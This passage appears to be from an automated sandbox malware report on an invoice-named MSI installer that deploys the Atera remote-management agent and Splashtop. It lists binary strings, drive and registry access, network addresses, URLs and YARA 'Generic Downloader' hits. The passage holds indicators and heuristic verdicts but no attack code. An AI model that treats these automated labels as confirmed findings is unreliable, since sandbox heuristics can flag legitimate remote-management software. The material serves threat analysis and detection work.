rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll1.13.dr
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration/netstandard2.0-Release/Microsoft.Extensions.Configuration.pdb source: Microsoft.Extensions.Configuration.dll0.26.dr
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdb source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: lib.pdb source: AgentPackageSTRemote.exe, 00000021.00000002.2691314024.000002EF74DD8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2784658706.000002203A692000.00000002.00000001.01000000.00000044.sdmp
                                Source: Binary string: \??\C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000037.00000003.2569504567.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570515142.0000000002F55000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: CliWrap.pdb source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageMonitoring\AgentPackageMonitoring\obj\Release\AgentPackageMonitoring.pdb source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: C:\Windows\System.pdbpdbtem.pdb! source: rundll32.exe, 00000037.00000002.2574650690.0000000007290000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\LiorKovarsky\Downloads\sharpsnmplib-11.3.0\sharpsnmplib-11.3.0\SharpSnmpLib\obj\Release\net45\win\SharpSnmpLib.pdb source: AgentPackageInternalPoller.exe, 0000002F.00000002.2469228610.0000022B9B262000.00000002.00000001.01000000.0000003B.sdmp
                                Source: Binary string: ent.pdb0Pff source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: ?+nC:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000037.00000002.2569972227.0000000000857000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\symbols\dll\AlphaControlAgentInstallation.pdbv source: rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration.Abstractions/netstandard2.0-Release/Microsoft.Extensions.Configuration.Abstractions.pdbSHA256^r? source: Microsoft.Extensions.Configuration.Abstractions.dll0.26.dr
                                Source: Binary string: System.pdb source: rundll32.exe, 00000037.00000002.2574650690.00000000072C4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\symbols\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pC:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\System.pdb source: rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Newtonsoft.Json.dll.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2861314309.0000022052F3B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: CliWrap.pdbSHA256j source: CliWrap.dll.26.dr
                                Source: Binary string: C:\Windows\AgentPackageUpgradeAgent.pdbpdbent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000C.00000002.1762341854.00000177B8112000.00000002.00000001.01000000.00000011.sdmp, Pubnub.dll0.1.dr
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000C.00000002.1762341854.00000177B8112000.00000002.00000001.01000000.00000011.sdmp, Pubnub.dll0.1.dr
                                Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdble source: rundll32.exe, 00000037.00000003.2569504567.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570515142.0000000002F55000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdbdditio source: rundll32.exe, 00000037.00000002.2574650690.00000000072C4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdb source: AgentPackageInternalPoller.exe, 0000002F.00000002.2462648805.0000022B9AFD2000.00000002.00000001.01000000.00000037.sdmp
                                Source: Binary string: D:\a\41\s\AteraNugetPackages\Atera.AgentPackages.CommonLib\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb source: Atera.AgentPackages.CommonLib.dll2.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdb source: AgentPackageTicketing.exe, 0000002C.00000000.2361394254.00000214714D2000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.FileProviders.Abstractions/Release/net8.0/Microsoft.Extensions.FileProviders.Abstractions.pdbSHA256 source: Microsoft.Extensions.FileProviders.Abstractions.dll0.26.dr
                                Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile opened: c:
                                Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.Messages.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B371A44h12_2_00007FFD9B371895
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B371FFFh12_2_00007FFD9B371895
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B371FFFh12_2_00007FFD9B371EA1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B371FFFh12_2_00007FFD9B371EB6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B371FFFh12_2_00007FFD9B371E7E
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B371873h12_2_00007FFD9B370C1D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B37227Bh12_2_00007FFD9B370C1D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B384ECBh13_2_00007FFD9B384C41
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B381873h13_2_00007FFD9B380C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B38227Bh13_2_00007FFD9B380C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B39B962h13_2_00007FFD9B39B606
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B384ECBh13_2_00007FFD9B384E45
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B39B962h13_2_00007FFD9B39B610
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B374ECBh26_2_00007FFD9B374E6B
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B594729h26_2_00007FFD9B59468C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B592DB0h26_2_00007FFD9B592BD0

                                Networking

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.119.152.241 443
                                Yara detected Generic Downloader
                                Source: Yara matchFile source: 20.0.AgentPackageAgentInformation.exe.2156b880000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 49.2.AgentPackageProgramManagement.exe.153fe540000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll, type: DROPPED
                                Source: Joe Sandbox ViewIP Address: 40.119.152.241 40.119.152.241
                                Source: Joe Sandbox ViewIP Address: 35.157.63.227 35.157.63.227
                                Source: Joe Sandbox ViewIP Address: 13.35.58.89 13.35.58.89
                                Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENT.PACKAGE.AVAILABILITY/0.16/AGENT.PACKAGE.AVAILABILITY.Z
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENT.PACKAGE.WATCHDOG/2.0/AGENT.PACKAGE.WATCHDOG.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEADREMOTE/6.0/AGENTPACKAGEADREMOTE.ZIP
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4291B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEAGENTINFORMATION/38.8/AGENTPACKAGEAGENTINFORMATI
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEINTERNALPOLLER/23.8/AGENTPACKAGEINTERNALPOLLER.Z
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMARKETPLACE/1.6/AGENTPACKAGEMARKETPLACE.ZIP
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMONITORING/38.1/AGENTPACKAGEMONITORING.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEOSUPDATES/30.3/AGENTPACKAGEOSUPDATES.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGERUNTIMEINSTALLER/1.6/AGENTPACKAGERUNTIMEINSTALLE
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGESTREMOTE/24.3/AGENTPACKAGESTREMOTE.ZIP
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a6dc35606b2c6816e.awsglobalaccelerator.com
                                Source: AteraAgent.exe, 0000000C.00000000.1718405720.000001779DAC2000.00000002.00000001.01000000.0000000F.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42751000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216304E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acontrol.atera.com/
                                Source: rundll32.exe, 00000004.00000002.1702577102.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C429FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C429F0000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004D75000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1981577832.000002150019F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.1981546902.0000015E0019F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B44000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B7A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE421000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE38A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE49E000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D9C4000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2437952320.0000022B827AB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380505000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004C15000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E2221D000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E22100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://agent-api.atera.com
                                Source: rundll32.exe, 00000004.00000002.1702577102.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C429F0000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004D75000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1981577832.000002150019F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.1981546902.0000015E0019F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B44000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B7A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE421000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE38A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE49E000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D9C4000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2437952320.0000022B827AB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380505000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004C15000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E2221D000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E22100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://atera-agent-api-eu.westeurope.cloudapp.azure.com
                                Source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A8AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blob.ams08prdstr06a.store.core.windows.net
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
